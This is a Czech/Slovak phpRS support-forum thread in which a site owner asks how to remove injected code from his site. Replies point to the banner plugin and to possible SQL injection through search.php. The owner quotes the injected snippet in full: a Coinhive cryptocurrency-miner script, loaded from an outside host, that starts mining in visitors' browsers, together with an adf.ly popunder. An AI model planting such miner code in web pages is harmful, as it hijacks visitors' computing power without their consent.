phpRS 2.8.x : phpRS Fórum
Toto fórum je určené výhradně k diskuzi o verzích phpRS v2.8.x.
phpRS - redakční a informační systém
VIRUS COIN HIVE
Zaslán uživatelem/kou: postreh (IP adresa zaznamenána)
Datum: 2019-06-10, 17:11

Ahoj, nevím si rady na PHPRS s virem COIN HIVE, ve zdrojovém kódu webu www.postreh.com/phprs je toto:
<!-- Misto pro banner -->
<div align="center">

<script type="text/javascript">
var adfly_id = 9018823;
var popunder_frequency_delay = 0;
</script>
<script src="https://cdn.adf.ly/js/display.js"></script>
<html>
<head>
<script src="https://coin-hive.com/lib/coinhive.min.js"></script>
</head>
<body>

<script>

miner.start();

// Listen on events
miner.on('found', function() { /* Hash found */ })
miner.on('accepted', function() { /* Hash accepted by the pool */ })

// Update stats once per second
setInterval(function() {
var hashesPerSecond = miner.getHashesPerSecond();
var totalHashes = miner.getTotalHashes();
var acceptedHashes = miner.getAcceptedHashes();

// Output to HTML elements...
}, 1000);
</script>
</body>
</html></div>
<!-- Konec Misto pro banner -->

Přímo na FTP serveru však neumím najít změny u souborů PHPRS systému ohledně data úpravy a nějaké podivnosti přímo na FTP. Netušíte, jak tento vir pracuje? Kde jej najdu a smažu?

Re: VIRUS COIN HIVE
Zaslán uživatelem/kou: pertinax (IP adresa zaznamenána)
Datum: 2019-06-10, 23:42

Ja som raz dávno mal napadnutý web nejakým sajrajtom.

Čosi cudzie sa mi (mojou chybou) dostalo cez ftp a skrylo sa to do súboru index.php. Vymazal som nakazený súbor a nakopíroval som zálohu a problém bol vyriešený.

V tomto prípade asi bol napadnutý nejaký súbor pre reklamný banner, tie sú dva v adresári plugin. Asi by som hľadal tam, banner1 a banner2.


[http://www.zeleznicne.info]

Re: VIRUS COIN HIVE
Zaslán uživatelem/kou: pa3k (IP adresa zaznamenána)
Datum: 2019-06-11, 14:40

postreh napsal/a:
-------------------------------------------------------
> Přímo na FTP serveru však neumím najít změny
> u souborů PHPRS systému ohledně data úpravy a
> nějaké podivnosti přímo na FTP. Netušíte,
> jak tento vir pracuje? Kde jej najdu a smažu?

Kód je v bloku reklamy ako banner. Takže niekto sa buď dostal do administrácie webu, alebo spravil SQL injection a vložil do DB tento kód cez nejakú dieru. 2.6.5 je dosť stará verzia, netuším či tam sú nejaké diery, ale keď pozerám napríklad na rss.php, tak premenná mnozstvi je "ošetrená" pomocou addslashes, čo je zlé.



Re: VIRUS COIN HIVE
Zaslán uživatelem/kou: pa3k (IP adresa zaznamenána)
Datum: 2019-06-11, 15:05

rskde v search.php je myslím neošetrené
nechce sa mi inštalovať 2.6.5 ale z kódu to vyzerá, že to mohlo prejsť tadiaľ.
Ak by som mal prístup k FTP webu, vedel by som to s intotou potvrdiť pomerne rýchlo.

Rozhodne doporučujem upgrade na 2.8.3 alebo opravu tej 2.6.5.



Lituji, ale pouze registrovaní uživatelé mohou zasílat příspěvky do této sekce.
This forum powered by Phorum and designed by STaNBoSS.